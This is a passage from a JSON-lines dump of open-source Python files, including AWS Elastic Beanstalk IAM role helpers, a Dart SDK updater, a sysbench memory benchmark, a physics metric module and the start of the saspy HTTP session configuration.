'\"ec2.amazonaws.com\"},\"Effect\": \"Allow\",\"Sid\": \"\"}]}'\n try:\n iam.create_role(role, document)\n except AlreadyExistsError:\n pass\n return role\n\n\ndef get_service_role():\n try:\n roles = iam.get_role_names()\n if DEFAULT_SERVICE_ROLE_NAME not in roles:\n return None\n except NotAuthorizedError:\n # No permissions to list roles\n # Assume role exists, we will handle error at a deeper level\n pass\n\n return DEFAULT_SERVICE_ROLE_NAME\n\n\ndef create_default_service_role():\n \"\"\"\n Create the default service role\n \"\"\"\n io.log_info('Creating service role {} with default permissions.'\n .format(DEFAULT_SERVICE_ROLE_NAME))\n trust_document = _get_default_service_trust_document()\n json_policy = _get_default_service_role_policy()\n role_name = DEFAULT_SERVICE_ROLE_NAME\n policy_name = 'awsebcli_aws-elasticbeanstalk-service-role_{}'\\\n .format(int(time.time()))\n try:\n iam.create_role_with_policy(role_name, trust_document,\n policy_name, json_policy)\n except NotAuthorizedError as e:\n # NO permissions to create or do something\n raise NotAuthorizedError(prompts['create.servicerole.nopermissions']\n .format(DEFAULT_SERVICE_ROLE_NAME, e))\n\n return DEFAULT_SERVICE_ROLE_NAME\n\n\ndef resolve_roles(env_request, interactive):\n \"\"\"\n Resolves instance-profile and service-role\n :param env_request: environment request\n :param interactive: boolean\n \"\"\"\n LOG.debug('Resolving roles')\n\n if env_request.instance_profile is None and \\\n env_request.template_name is None:\n # Service supports no profile, however it is not good/recommended\n # Get the eb default profile\n env_request.instance_profile = get_default_profile()\n\n\n if (env_request.platform.has_healthd_support() and # HealthD enabled\n (env_request.service_role is None) and\n (env_request.template_name is None)):\n role = get_service_role()\n if role is None:\n if interactive:\n io.echo()\n io.echo(prompts['create.servicerole.info'])\n input = io.get_input(prompts['create.servicerole.view'],\n default='')\n\n if input.strip('\"').lower() == 'view':\n io.echo(_get_default_service_role_policy())\n io.get_input(prompts['general.pressenter'])\n\n role = create_default_service_role()\n else:\n raise NotSupportedError(prompts['create.servicerole.required'])\n\n env_request.service_role = role\n\n\ndef _get_default_service_trust_document():\n \"\"\"\n Just a string representing the service role policy.\n Includes newlines for pretty printing :)\n \"\"\"\n return \\\n'''{\n \"Version\": \"2012-10-17\",\n \"Statement\": [{\n \"Sid\": \"\",\n \"Effect\": \"Allow\",\n \"Principal\": {\n \"Service\": \"elasticbeanstalk.amazonaws.com\"\n },\n \"Action\": \"sts:AssumeRole\",\n \"Condition\": {\n \"StringEquals\": {\n \"sts:ExternalId\": \"elasticbeanstalk\"\n }\n }\n }]\n}'''\n\n\ndef _get_default_service_role_policy():\n \"\"\"\n Just a string representing the service role policy.\n Includes newlines for pretty printing :)\n \"\"\"\n return \\\n'''{\n \"Version\": \"2012-10-17\",\n \"Statement\": [{\n \"Effect\": \"Allow\",\n \"Action\": [\n \"elasticloadbalancing:DescribeInstanceHealth\",\n \"ec2:DescribeInstances\",\n \"ec2:DescribeInstanceStatus\",\n \"ec2:GetConsoleOutput\",\n \"ec2:AssociateAddress\",\n \"ec2:DescribeAddresses\",\n \"ec2:DescribeSecurityGroups\",\n \"sqs:GetQueueAttributes\",\n \"sqs:GetQueueUrl\",\n \"autoscaling:DescribeAutoScalingGroups\",\n \"autoscaling:DescribeAutoScalingInstances\",\n \"autoscaling:DescribeScalingActivities\",\n \"autoscaling:DescribeNotificationConfigurations\"\n ],\n \"Resource\": [\"*\"]\n }]\n}'''"} {"ext": "py", "sha": "1a30b5e798e4cba290fc30b4e086e8e5467436e2", "content": "#!/usr/bin/env python\n# Copyright 2016 The Dart project authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\n# This script downloads the latest dev SDK from\n# http://gsdview.appspot.com/dart-archive/channels/dev/raw/latest/sdk/\n# into tools/sdks/. It is intended to be invoked from Jiri hooks in\n# a Fuchsia checkout.\n\nimport os\nimport sys\nimport zipfile\nimport urllib\nimport utils\n\nHOST_OS = utils.GuessOS()\nHOST_ARCH = utils.GuessArchitecture()\nSCRIPT_DIR = os.path.dirname(sys.argv[0])\nDART_ROOT = os.path.realpath(os.path.join(SCRIPT_DIR, '..'))\n\nDEFAULT_DART_VERSION = 'latest'\nBASE_URL = 'http://gsdview.appspot.com/dart-archive/channels/dev/raw/%s/sdk/%s'\n\n\ndef host_os_for_sdk(host_os):\n if host_os.startswith('macos'):\n return 'mac'\n if host_os.startswith('win'):\n return 'windows'\n return host_os\n\n\n# Python's zipfile doesn't preserve file permissions during extraction, so we\n# have to do it manually.\ndef extract_file(zf, info, extract_dir):\n try:\n zf.extract(info.filename, path=extract_dir)\n out_path = os.path.join(extract_dir, info.filename)\n perm = info.external_attr >> 16L\n os.chmod(out_path, perm)\n except IOError as err:\n if 'dart-sdk/bin/dart' in err.filename:\n print(\n 'Failed to extract the new Dart SDK dart binary. ' +\n 'Kill stale instances (like the analyzer) and try the update again'\n )\n return False\n raise\n return True\n\n\ndef main(argv):\n host_os = host_os_for_sdk(HOST_OS)\n zip_file = ('dartsdk-%s-x64-release.zip' % HOST_OS)\n sha_file = zip_file + '.sha256sum'\n sdk_path = os.path.join(DART_ROOT, 'tools', 'sdks')\n local_sha_path = os.path.join(sdk_path, sha_file)\n remote_sha_path = os.path.join(sdk_path, sha_file + '.remote')\n zip_path = os.path.join(sdk_path, zip_file)\n\n sdk_version = DEFAULT_DART_VERSION\n sha_url = (BASE_URL % (sdk_version, sha_file))\n zip_url = (BASE_URL % (sdk_version, zip_file))\n\n local_sha = ''\n if os.path.isfile(local_sha_path):\n with open(local_sha_path, 'r') as fp:\n local_sha = fp.read()\n\n remote_sha = ''\n urllib.urlretrieve(sha_url, remote_sha_path)\n with open(remote_sha_path, 'r') as fp:\n remote_sha = fp.read()\n os.remove(remote_sha_path)\n\n if local_sha == '' or local_sha != remote_sha:\n print 'Downloading prebuilt Dart SDK from: ' + zip_url\n urllib.urlretrieve(zip_url, zip_path)\n with zipfile.ZipFile(zip_path, 'r') as zf:\n for info in zf.infolist():\n if not extract_file(zf, info, sdk_path):\n return -1\n with open(local_sha_path, 'w') as fp:\n fp.write(remote_sha)\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv))\n"} {"ext": "py", "sha": "1a30b712bd8d569d2562e6e7c4f964befb20ca90", "content": "from setuptools import setup\n\nsetup(\n # Packaging meta-data\n name='Vimcryption',\n version='0.1',\n description='Test package for vimcryption VIM plugin.',\n author='Tom Manner, Miguel Nistal',\n author_email='tom.s.manner@gmail.com, nistam328@gmail.com',\n url='https://www.github.com/tsmanner/vimcryption',\n # Travis Unit-Test Installation\n install_requires=[\n 'anybadge==0.1.0.dev2',\n 'codecov',\n 'coverage>=4.5',\n 'coverage-badge',\n 'nose2',\n 'nose2[coverage_plugin]>=0.6.5',\n 'numpy',\n 'pylint',\n ],\n packages=[\n 'encryptionengine',\n ],\n)\n"} {"ext": "py", "sha": "1a30b966604a7174adb21aa449e1afcf3d23daa2", "content": "#!/usr/bin/env python\n# coding: utf-8\n\n# Copyright (c) Microsoft. All rights reserved.\n# Licensed under the MIT license. See LICENSE.md file in the project root for full license information.\n\nimport droid_speech\n#import intent_sample\n#import translation_sample\n#import speech_synthesis_sample\n\nfrom collections import OrderedDict\nimport platform\n\n#eofkey = 'Ctrl-Z' if \"Windows\" == platform.system() else 'Ctrl-D'\n\ndroidspeechfunctions = OrderedDict([\n (droid_speech, [\n droid_speech.speech_recognize_once_from_mic,\n droid_speech.speech_recognize_once_from_file,\n droid_speech.speech_recognize_once_compressed_input,\n droid_speech.speech_recognize_once_from_file_with_customized_model,\n droid_speech.speech_recognize_once_from_file_with_custom_endpoint_parameters,\n droid_speech.speech_recognize_async_from_file,\n droid_speech.speech_recognize_continuous_from_file,\n droid_speech.speech_recognition_with_pull_stream,\n droid_speech.speech_recognition_with_push_stream,\n droid_speech.speech_recognize_keyword_from_microphone,\n droid_speech.speech_recognize_keyword_locally_from_microphone,\n droid_speech.pronunciation_assessment_from_microphone,\n ])\n])\n\n\ndef select():\n modules = list(droidspeechfunctions.keys())\n\n try:\n selected_module = modules[0]\n except EOFError:\n raise\n except Exception as e:\n print(e)\n return\n\n try:\n selected_function = droidspeechfunctions[selected_module][10]\n except EOFError:\n raise\n except Exception as e:\n print(e)\n return\n\n try:\n selected_function()\n except Exception as e:\n print('Error running droid funtion: {}'.format(e))\n\n print()\n\n\nwhile True:\n try:\n select()\n except EOFError:\n break\n"} {"ext": "py", "sha": "1a30b969cc1750ade029234dd85ad406f3134d9a", "content": "import itertools\nfrom collections import OrderedDict\n\nfrom rest_framework import filters, exceptions\n\nfrom .mixin import ViewSetMixin\n\n\ndef get_sort_order(request, param):\n args = request.query_params.getlist(param)\n fields = itertools.chain(*(arg.split(',') for arg in args))\n order = tuple(field.strip() for field in fields if field)\n return order\n\n\nclass OrderingFilter(filters.OrderingFilter):\n\n @staticmethod\n def get_translated_sort_order(fields, field_map):\n return tuple(field_map.get(field, field) for field in fields)\n\n @staticmethod\n def get_reverse_translated_sort_order(fields, field_map):\n sort_field_reverse_map = {value: key for (key, value) in field_map.items()}\n return tuple(sort_field_reverse_map.get(field, field) for field in fields)\n\n @staticmethod\n def get_consistent_sort_order(fields):\n return fields + type(fields)(('pk',))\n\n def get_ordering(self, request, queryset, view):\n fields = get_sort_order(request, self.ordering_param)\n\n if fields:\n field_map = getattr(view, 'sort_field_map', {})\n\n fields = self.get_translated_sort_order(fields, field_map)\n ordering = self.remove_invalid_fields(queryset, fields, view, request)\n\n if len(ordering) != len(fields):\n ext_fields = self.get_reverse_translated_sort_order(fields, field_map)\n ext_ordering = self.get_reverse_translated_sort_order(ordering, field_map)\n\n errors = {}\n\n for ext_field in ext_fields:\n if ext_field not in ext_ordering:\n errors[ext_field] = 'invalid field'\n\n raise exceptions.ValidationError(errors)\n\n ordering = self.get_consistent_sort_order(ordering)\n\n else:\n ordering = self.get_default_ordering(view)\n\n consistent_sort = getattr(view, 'consistent_sort', True)\n if consistent_sort:\n ordering = self.get_consistent_sort_order(ordering)\n\n return ordering\n\n\nclass SortedModelMixin(ViewSetMixin):\n ordering = ()\n\n sort_field_map = {}\n consistent_sort = True\n\n def list(self, request, *args, **kwargs):\n sort = get_sort_order(request, OrderingFilter.ordering_param) or self.ordering\n\n context = OrderedDict(sort=','.join(sort))\n\n return self.decorated_list(SortedModelMixin, context, request, *args, **kwargs)\n"} {"ext": "py", "sha": "1a30b9a21b52c8bbc88eb6948115ea78e0b0b199", "content": "# Distributed under the MIT License.\n# See LICENSE.txt for details.\n\nimport numpy as np\nfrom numpy import sqrt, exp\nfrom scipy.optimize import newton\n\n# Isotropic Schwarzschild coordinates\n\n\ndef conformal_metric_isotropic(x, mass):\n return np.identity(3)\n\n\ndef inv_conformal_metric_isotropic(x, mass):\n return np.identity(3)\n\n\ndef deriv_conformal_metric_isotropic(x, mass):\n return np.zeros((3, 3, 3))\n\n\ndef extrinsic_curvature_trace_isotropic(x, mass):\n return 0.\n\n\ndef extrinsic_curvature_trace_gradient_isotropic(x, mass):\n return np.zeros(3)\n\n\ndef conformal_factor_isotropic(x, mass):\n r = np.linalg.norm(x)\n return 1. + 0.5 * mass / r\n\n\ndef conformal_factor_gradient_isotropic(x, mass):\n r = np.linalg.norm(x)\n return -0.5 * mass * x / r**3\n\n\ndef lapse_times_conformal_factor_isotropic(x, mass):\n r = np.linalg.norm(x)\n return 1. - 0.5 * mass / r\n\n\ndef lapse_times_conformal_factor_gradient_isotropic(x, mass):\n r = np.linalg.norm(x)\n return 0.5 * mass * x / r**3\n\n\ndef lapse_isotropic(x, mass):\n return (lapse_times_conformal_factor_isotropic(x, mass) /\n conformal_factor_isotropic(x, mass))\n\n\ndef shift_background(x, mass):\n return np.zeros(3)\n\n\ndef longitudinal_shift_background_minus_dt_conformal_metric(x, mass):\n return np.zeros((3, 3))\n\n\ndef shift_isotropic(x, mass):\n return np.zeros(3)\n\n\ndef shift_strain_isotropic(x, mass):\n return np.zeros((3, 3))\n\n\ndef longitudinal_shift_isotropic(x, mass):\n return np.zeros((3, 3))\n\n\ndef shift_dot_extrinsic_curvature_trace_gradient_isotropic(x, mass):\n return 0.\n\n\ndef longitudinal_shift_minus_dt_conformal_metric_square_isotropic(x, mass):\n return 0.\n\n\ndef longitudinal_shift_minus_dt_conformal_metric_over_lapse_square_isotropic(\n x, mass):\n return 0.\n\n\n# Matter sources\n\n\ndef energy_density(x, mass):\n return 0.\n\n\ndef stress_trace(x, mass):\n return 0.\n\n\ndef momentum_density(x, mass):\n return np.zeros(3)\n\n\n# Fixed sources\n\n\ndef conformal_factor_fixed_source(x, mass):\n return 0.\n\n\ndef lapse_times_conformal_factor_fixed_source(x, mass):\n return 0.\n\n\ndef shift_fixed_source(x, mass):\n return np.zeros(3)\n"} {"ext": "py", "sha": "1a30ba368b79e15be22447dcdc619bec936cddc4", "content": "# -*- coding: utf-8 -*-\n#\n# Copyright 2015 Red Hat, Inc.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\"\"\"\nBenchmark Memory functions.\n\"\"\"\n\nimport re\nimport subprocess\nimport sys\n\nimport six\n\nfrom hardware.benchmark import utils\n\n\ndef get_available_memory():\n \"\"\"Return the total amount of available memory, in bytes.\"\"\"\n with open('/proc/meminfo', 'r') as meminfo:\n for line in meminfo:\n if line.startswith('MemFree:'):\n return int(line.split()[1]) * 1024\n return -1\n\n\ndef check_mem_size(block_size, cpu_count):\n \"\"\"Check if a test can run with a given block size and cpu count.\"\"\"\n dsplit = re.compile(r'\\d+')\n ssplit = re.compile(r'[A-Z]+')\n unit = ssplit.findall(block_size)\n unit_in_bytes = 1\n if unit[0] == 'K':\n unit_in_bytes = 1024\n elif unit[0] == 'M':\n unit_in_bytes = 1024 * 1024\n elif unit[0] == 'G':\n unit_in_bytes = 1024 * 1024 * 1024\n\n size_in_bytes = (unit_in_bytes * int(dsplit.findall(block_size)[0])\n * cpu_count)\n if size_in_bytes > get_available_memory():\n return False\n\n return True\n\n\ndef run_sysbench_memory_threaded(hw_lst, max_time, block_size, cpu_count,\n processor_num=None):\n \"\"\"Running memtest on a processor.\"\"\"\n check_mem = check_mem_size(block_size, cpu_count)\n taskset = ''\n if processor_num is not None:\n if check_mem is False:\n msg = (\"Avoid Benchmarking memory @%s \"\n \"from CPU %d, not enough memory\\n\")\n sys.stderr.write(msg % (block_size, processor_num))\n return\n\n sys.stderr.write('Benchmarking memory @%s from CPU %d'\n ' for %d seconds (%d threads)\\n' %\n (block_size, processor_num, max_time, cpu_count))\n taskset = 'taskset %s' % hex(1 << processor_num)\n else:\n if check_mem is False:\n msg = (\"Avoid Benchmarking memory @%s \"\n \"from all CPUs, not enough memory\\n\")\n sys.stderr.write(msg % block_size)\n return\n sys.stderr.write('Benchmarking memory @%s from all CPUs '\n 'for %d seconds (%d threads)\\n'\n % (block_size, max_time, cpu_count))\n\n _cmd = ('%s sysbench --max-time=%d --max-requests=100000000 '\n '--num-threads=%d --test=memory --memory-block-size=%s run')\n sysbench_cmd = subprocess.Popen(_cmd % (taskset, max_time,\n cpu_count, block_size),\n shell=True, stdout=subprocess.PIPE)\n\n for line in sysbench_cmd.stdout:\n if isinstance(line, six.binary_type):\n line = line.decode()\n if \"transferred\" in line:\n _, right = line.rstrip('\\n').replace(' ', '').split('(')\n perf, _ = right.split('.')\n if processor_num is not None:\n hw_lst.append(('cpu',\n 'logical_%d' % processor_num,\n 'bandwidth_%s' % block_size,\n perf))\n else:\n hw_lst.append(('cpu', 'logical',\n 'threaded_bandwidth_%s' % block_size,\n perf))\n\n\ndef run_sysbench_memory_forked(hw_lst, max_time, block_size, cpu_count):\n \"\"\"Running forked memtest on a processor.\"\"\"\n if check_mem_size(block_size, cpu_count) is False:\n cmd = ('Avoid benchmarking memory @%s from all'\n ' CPUs (%d forked processes), not enough memory\\n')\n sys.stderr.write(cmd % (block_size, cpu_count))\n return\n sys.stderr.write('Benchmarking memory @%s from all CPUs'\n ' for %d seconds (%d forked processes)\\n'\n % (block_size, max_time, cpu_count))\n sysbench_cmd = '('\n for _ in range(cpu_count):\n _cmd = ('sysbench --max-time=%d --max-requests=100000000 '\n '--num-threads=1 --test=memory --memory-block-size=%s run &')\n sysbench_cmd += _cmd % (max_time, block_size)\n\n sysbench_cmd.rstrip('&')\n sysbench_cmd += ')'\n\n global_perf = 0\n process = subprocess.Popen(\n sysbench_cmd, shell=True, stdout=subprocess.PIPE)\n for line in process.stdout:\n if isinstance(line, six.binary_type):\n line = line.decode()\n if \"transferred\" in line:\n _, right = line.rstrip('\\n').replace(' ', '').split('(')\n perf, _ = right.split('.')\n global_perf += int(perf)\n\n hw_lst.append(('cpu', 'logical', 'forked_bandwidth_%s' %\n (block_size), str(global_perf)))\n\n\ndef mem_perf(hw_lst, max_time=5):\n \"\"\"Report the memory performance.\"\"\"\n all_cpu_testing_time = 5\n block_size_list = ['1K', '4K', '1M', '16M', '128M', '1G', '2G']\n logical = utils.get_value(hw_lst, 'cpu', 'logical', 'number')\n physical = utils.get_value(hw_lst, 'cpu', 'physical', 'number')\n if physical:\n eta = int(physical) * len(block_size_list) * max_time\n eta += 2 * (all_cpu_testing_time * len(block_size_list))\n sys.stderr.write('Memory Performance: %d logical CPU'\n ' to test (ETA: %d seconds)\\n'\n % (int(physical), int(eta)))\n for cpu_nb in utils.get_one_cpu_per_socket(hw_lst):\n for block_size in block_size_list:\n run_sysbench_memory_threaded(hw_lst, max_time,\n block_size, 1, cpu_nb)\n\n # There is not need to test fork vs thread\n # if only a single logical cpu is present\n if int(logical) > 1:\n for block_size in block_size_list:\n run_sysbench_memory_threaded(hw_lst, all_cpu_testing_time,\n block_size, int(logical))\n\n for block_size in block_size_list:\n run_sysbench_memory_forked(hw_lst, all_cpu_testing_time,\n block_size, int(logical))\n"} {"ext": "py", "sha": "1a30ba4af27a0e287d5e46d9899c89b52cd03209", "content": "# -*- coding: utf-8 -*-\n\n\"\"\"\n********************************\nreslib.processing.loops\n********************************\n\nThis module provides convenience functions for looping over data, typically a DataFrame (or reslib.data.Table), and automating things like progress reporting (via tqdm or status files) or parallelization.\n\n:copyright: (c) 2019 by Maclean Gaulin.\n:license: MIT, see LICENSE for more details.\n\"\"\""} {"ext": "py", "sha": "1a30bb811b7dbb946a3fc858ca1704ee8fe83a55", "content": "# uncompyle6 version 3.3.1\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.2 (v3.6.2:5fd33b5926, Jul 16 2017, 20:11:06) \n# [GCC 4.2.1 (Apple Inc. build 5666) (dot 3)]\n# Embedded file name: ../../shared/problems/CR/problem1068_CR.py\n# Compiled at: 2019-03-13 18:01:49\n# Size of source mod 2**32: 1148 bytes\n__author__ = 'patras'\nfrom domain_chargeableRobot import *\nfrom timer import DURATION\nfrom state import state\nDURATION.TIME = {'put':2, \n 'take':2, \n 'perceive':2, \n 'charge':2, \n 'move':2, \n 'moveToEmergency':2, \n 'moveCharger':2, \n 'addressEmergency':2, \n 'wait':2}\nDURATION.COUNTER = {'put':2, \n 'take':2, \n 'perceive':2, \n 'charge':2, \n 'move':2, \n 'moveToEmergency':2, \n 'moveCharger':2, \n 'addressEmergency':2, \n 'wait':2}\nrv.LOCATIONS = [\n 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\nrv.EDGES = {1:[2], 2:[1, 3], 3:[2, 4], 4:[5, 3, 6, 7], 5:[4, 9], 6:[4, 10], 7:[4, 8], 8:[7], 9:[5], 10:[6]}\nrv.OBJECTS = ['o1']\nrv.ROBOTS = [\n 'r1', 'r2']\n\ndef ResetState():\n state.loc = {'r1':1, \n 'r2':1}\n state.charge = {'r1':2, 'r2':3}\n state.load = {'r1':NIL, 'r2':NIL}\n state.pos = {'c1':'r2', 'o1':5}\n state.containers = {1:[], 2:[], 3:[], 4:[], 5:['o1'], 6:[], 7:[], 8:[], 9:[], 10:[]}\n state.emergencyHandling = {'r1':False, 'r2':False}\n state.view = {}\n for l in rv.LOCATIONS:\n state.view[l] = False\n\n\ntasks = {5: [['fetch', 'r1', 'o1']]}\neventsEnv = {}\n# okay decompiling __pycache__/problem1068_CR.cpython-36.pyc\n"} {"ext": "py", "sha": "1a30bbea337233d6a726817bfaa16aa586c048b3", "content": "#\n# Copyright SAS Institute\n#\n# Licensed under the Apache License, Version 2.0 (the License);\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport http.client as hc\nimport base64\nimport json\nimport os\nimport ssl\nimport sys\nimport urllib\nimport warnings\nimport io\n\nimport tempfile as tf\nfrom time import sleep\n\nfrom saspy.sasexceptions import (SASHTTPauthenticateError, SASHTTPconnectionError, SASHTTPsubmissionError)\n\nimport logging\nlogger = logging.getLogger('saspy')\n\ntry:\n import pandas as pd\n import numpy as np\nexcept ImportError:\n pass\n\nclass SASconfigHTTP:\n '''\n This object is not intended to be used directly. Instantiate a SASsession object instead\n '''\n def __init__(self, session, **kwargs):\n self._kernel = kwargs.get('kernel', None)\n SAScfg = session._sb.sascfg.SAScfg\n self.name = session._sb.sascfg.name\n cfg = getattr(SAScfg, self.name)\n\n self._token = cfg.get('authtoken', None)\n self.url = cfg.get('url', '')\n self.ip = cfg.get('ip', '')\n self.port = cfg.get('port', None)\n self.ctxname = cfg.get('context', '')\n self.ctx = {}\n self.options = cfg.get('options', [])\n self.ssl = cfg.get('ssl', True)\n self.verify = cfg.get('verify', True)\n self.timeout = cfg.get('timeout', None)\n user = cfg.get('user', '')\n pw = cfg.get('pw', '')\n client_id = cfg.get('client_id', None)\n client_secret = cfg.get('client_secret', '')\n authcode = cfg.get('authcode', None)\n jwt = cfg.get('jwt', None)\n self.encoding = cfg.get('encoding', '')\n self.authkey = cfg.get('authkey', '')\n self._prompt = session._sb.sascfg._prompt\n self.lrecl = cfg.get('lrecl', None)\n self.inactive = cfg.get('inactive', 120)\n\n try:\n self.outopts = getattr(SAScfg, \"SAS_output_options\")\n self.output = self.outopts.get('output', 'html5')\n except:\n self.output = 'html5'\n\n if self.output.lower() not in ['html', 'html5']:\n logger.warning(\"Invalid value specified for SAS_output_options. Using the default of HTML5\")\n self.output = 'html5'\n\n # GET Config options\n try:\n self.cfgopts = getattr(SAScfg, \"SAS_config_options\")\n except:\n self.cfgopts = {}\n\n lock = self.cfgopts.get('lock_down', True)\n # in lock down mode, don't allow runtime overrides of option values from the config file.\n\n self.verbose = self.cfgopts.get('verbose', True)\n self.verbose = kwargs.get('verbose', self.verbose)\n\n inurl = kwargs.get('url', None)\n if inurl is not None:\n if lock and len(self.url):\n logger.warning(\"Parameter 'url' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n self.url = inurl\n\n inip = kwargs.get('ip', None)\n if inip is not None:\n if lock and len(self.ip):\n logger.warning(\"Parameter 'ip' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n self.ip = inip\n\n inport = kwargs.get('port', None)\n if inport is not None:\n if lock and self.port:\n logger.warning(\"Parameter 'port' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n self.port = inport\n\n inctxname = kwargs.get('context', None)\n if inctxname is not None:\n if lock and len(self.ctxname):\n logger.warning(\"Parameter 'context' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n self.ctxname = inctxname\n\n inoptions = kwargs.get('options', None)\n if inoptions is not None:\n if lock and len(self.options):\n logger.warning(\"Parameter 'options' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n self.options = inoptions\n\n inssl = kwargs.get('ssl', None)\n if inssl is not None:\n if lock and self.ssl:\n logger.warning(\"Parameter 'ssl' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n self.ssl = bool(inssl)\n\n inver = kwargs.get('verify', None)\n if inver is not None:\n if lock and self.verify:\n logger.warning(\"Parameter 'verify' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n self.verify = bool(inver)\n\n intout = kwargs.get('timeout', None)\n if intout is not None:\n if lock and self.timeout:\n logger.warning(\"Parameter 'timeout' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n self.timeout = intout\n\n inencoding = kwargs.get('encoding', 'NoOverride')\n if inencoding != 'NoOverride':\n if lock and len(self.encoding):\n logger.warning(\"Parameter 'encoding' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n self.encoding = inencoding\n if not self.encoding or self.encoding != 'utf_8':\n self.encoding = 'utf_8'\n\n inautht = kwargs.get('authtoken', None)\n if inautht is not None:\n self._token = inautht\n\n injwt = kwargs.get('jwt', None)\n if injwt is not None:\n jwt = injwt\n\n inauthc = kwargs.get('authcode', None)\n if inauthc is not None:\n authcode = inauthc\n\n incis = kwargs.get('client_secret', None)\n if incis is not None:\n if lock and client_secret:\n logger.warning(\"Parameter 'client_secret' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n client_secret = incis\n\n incid = kwargs.get('client_id', None)\n if incid is not None:\n if lock and client_id:\n logger.warning(\"Parameter 'client_id' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n client_id = incid\n if client_id is None:\n client_id = 'SASPy'\n use_authcode = False\n else:\n use_authcode = True\n\n inlrecl = kwargs.get('lrecl', None)\n if inlrecl is not None:\n if lock and self.lrecl:\n logger.warning(\"Parameter 'lrecl' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n self.lrecl = inlrecl\n if not self.lrecl:\n self.lrecl = 1048576\n\n inito = kwargs.get('inactive', None)\n if inito is not None:\n if lock and self.inactive:\n logger.warning(\"Parameter 'inactive' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n self.inactive = inito\n\n inak = kwargs.get('authkey', '')\n if len(inak) > 0:\n if lock and len(self.authkey):\n logger.warning(\"Parameter 'authkey' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n self.authkey = inak\n\n if len(self.url) > 0:\n http = self.url.split('://')\n hp = http[1].split(':')\n if http[0].lower() in ['http', 'https']:\n self.ip = hp[0]\n self.port = hp[1] if len(hp) > 1 else self.port\n self.ssl = True if 's' in http[0].lower() else False\n else:\n logger.warning(\"Parameter 'url' not in recognized format. Expeting 'http[s]://host[:port]'. Ignoring parameter.\")\n\n while len(self.ip) == 0:\n if not lock:\n self.ip = self._prompt(\"Please enter the host (ip address) you are trying to connect to: \")\n if self.ip is None:\n self._token = None\n raise RuntimeError(\"No IP address provided.\")\n else:\n logger.fatal(\"In lockdown mode and missing ip adress in the config named: \"+cfgname )\n raise RuntimeError(\"No IP address provided.\")\n\n if not self.port:\n if self.ssl:\n self.port = 443\n else:\n self.port = 80\n\n if not self._token and not authcode and not jwt:\n found = False\n if self.authkey:\n if os.name == 'nt':\n pwf = os.path.expanduser('~')+os.sep+'_authinfo'\n else:\n pwf = os.path.expanduser('~')+os.sep+'.authinfo'\n try:\n fid = open(pwf, mode='r')\n for line in fid:\n if line.startswith(self.authkey):\n user = line.partition('user')[2].lstrip().partition(' ')[0].partition('\\n')[0]\n pw = line.partition('password')[2].lstrip().partition(' ')[0].partition('\\n')[0]\n found = True\n break\n fid.close()\n except OSError as e:\n logger.warning('Error trying to read authinfo file:'+pwf+'\\n'+str(e))\n pass\n except:\n pass\n\n if not found:\n logger.warning('Did not find key '+self.authkey+' in authinfo file:'+pwf+'\\n')\n\n inuser = kwargs.get('user', '')\n if len(inuser) > 0:\n if lock and len(user):\n logger.warning(\"Parameter 'user' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n user = inuser\n\n inpw = kwargs.get('pw', '')\n if len(inpw) > 0:\n if lock and len(pw):\n logger.warning(\"Parameter 'pw' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n pw = inpw\n\n if use_authcode:\n code_pw = 'authcode'\n else:\n code_pw = ''\n if len(user) == 0:\n msg = \"To connect to Viya you need either an authcode or a userid/pw. Neither were provided.\\n\"\n msg += \"Please enter which one you want to enter next. Type one of these now: [default=authcode | userid]: \"\n while code_pw.lower() not in ['userid','authcode']:\n code_pw = self._prompt(msg)\n if code_pw == '':\n code_pw = 'authcode'\n if code_pw is None:\n self._token = None\n raise RuntimeError(\"Neither authcode nor userid provided.\")\n\n if code_pw.lower() == 'authcode':\n purl = \"/SASLogon/oauth/authorize?client_id={}&response_type=code\".format(client_id)\n if len(self.url) > 0:\n purl = self.url+purl\n else:\n purl = \"http{}://{}:{}{}\".format('s' if self.ssl else '', self.ip, self.port, purl)\n msg = \"The default url to authenticate with would be {}\\n\".format(purl)\n msg += \"Please enter authcode: \"\n authcode = self._prompt(msg)\n if authcode is None:\n self._token = None\n raise RuntimeError(\"No authcode provided.\")\n else:\n while len(user) == 0:\n user = self._prompt(\"Please enter userid: \")\n if user is None:\n self._token = None\n raise RuntimeError(\"No userid provided.\")\n\n while len(pw) == 0:\n pw = self._prompt(\"Please enter password: \", pw = True)\n if pw is None:\n self._token = None\n raise RuntimeError(\"No password provided.\")\n\n if self.ssl:\n if self.verify:\n # handle having self signed certificate default on Viya w/out copies on client; still ssl, just not verifyable\n try:\n self.HTTPConn = hc.HTTPSConnection(self.ip, self.port, timeout=self.timeout)\n if not self._token:\n self._token = self._authenticate(user, pw, authcode, client_id, client_secret, jwt)\n except ssl.SSLError as e:\n logger.warning(\"SSL 